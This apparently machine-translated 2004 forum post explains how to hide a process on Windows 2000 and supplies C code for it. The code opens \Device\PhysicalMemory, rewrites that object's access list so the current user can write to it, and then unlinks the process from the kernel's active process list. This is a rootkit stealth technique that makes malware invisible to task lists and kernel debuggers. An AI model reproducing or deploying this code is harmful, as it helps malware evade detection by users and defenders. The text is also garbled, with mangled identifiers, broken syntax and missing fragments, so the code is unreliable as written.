A solution hidden under Win2000 process
【Key words: Win2000 Process hidden program entry: Zeng Source: huiyun.net Time: 2004-2-20 18:44:12 Click: 60 times
The last time I mentioned this thing, because it is very simple to feel that there is no need to say anything, but some people ask for writing, so add a few words: many posts have an analysis, such as APIHOOK, system service hook, etc. Thread injection does not have its own process, this is not "hidden". Here you write a completely hidden method of 2000, it is very simple, there is no new idea. Before explanation, first mention some structures, there are several processes related chains in the process enforcement block, one of which is the active process chain. One of the important roles of this chain is to query system information for traversing the current activity process. It is interesting that M $ may not use it due to efficiency factors that make it excluded from the process core block means that the thread switched switch is not taken, further It is said that it should not be negligible issues (this is the basis of this program). How to do it is obvious, delete the process you want to have in the bidirectional chain of the activity process or the core debugger (such as Softice / Proc) can not be found.
The code for hiding the current process under 2000 is as follows: #include
NULL) {FreeLibrary (g_hNtDLL);}} VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PACL pNewDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if (dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, ! NULL, NULL, & pDacl, NULL, & pSD) = ERROR_SUCCESS) {goto CleanUp;} ZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee .TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if (! dwRes = SetEntriesInAcl (1, & ea, pDacl, & pNewDacl) = ERROR_SUCCESS) {goto CleanUp;} if (dwRes = ! SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL) = ERROR_SUCCESS) {goto CleanUp;} CleanUp: if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (pNewDacl);} HANDLE OpenPhysicalMemory () {NTSTATUS Status; unicode_string physmemstring; object_attributes attributes; rt lInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes. SecurityQualityOfService = NULL; status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZWOPENSECTION (&)
(! NT_SUCCESS (status); | g_hMPM, SECTION_MAP_READ SECTION_MAP_WRITE, & attributes)} if) {return NULL;} g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, 4,0,0x30000,0x1000); if (g_pMapPhysicalMemory == NULL) {return NULL;} Return g_hmpm;} Pvoid LineTDRPHYS (Pulong Baseaddress, Pvoid Addr) {Ulong Vaddr = (Ulong) Addr, PGDE, PTE, Paddr; PGDE = BaseAddress [VADDR >> 22]; IF ((PGDE & 1)! = 0) {ulong TMP = PGDE & 0x00000080; if (tmp = 0!) {PAddr = (PGDE & 0xFFC00000) (vAddr & 0x003FFFFF);} else {PGDE = (ULONG) MapViewOfFile (g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG) PGDE) [(VADDR & 0x003FF000) >> 12]; IF ((PTE & 1)! = 0) {PADDR = (PTE & 0xFFFFFF000) (VADDR & 0x00000FFF); UnmapViewOffile (PVOID) PGDE);} else return 0;}} else return 0; return (PVOID) PAddr;} ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, 4, 0, phys & 0xfffff000 , 0x1000); if (TMP == 0) Return 0; Ulong Ret = TMP [(PHYS & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;} bool setdata (pvoid addr, ulong data) {Ulong Phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp == 0) return FALSE; tmp [ (PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP); return true;} Bool HideProcessatall () {if (initntdll ()) {ix (OpenPhysicalMemory () == 0) {Return False;} ulong thread = GetData (PVOID) 0xffdff124); ulong process = getData (PVOID (Thread 0x22C)); Ulong FW = getData (PVOID (Process 0xA0)), BW = getData (PVOID (Process 0xA4)); setData (PVOID) FW 4), BW); SetData (PVOID (BW), FW);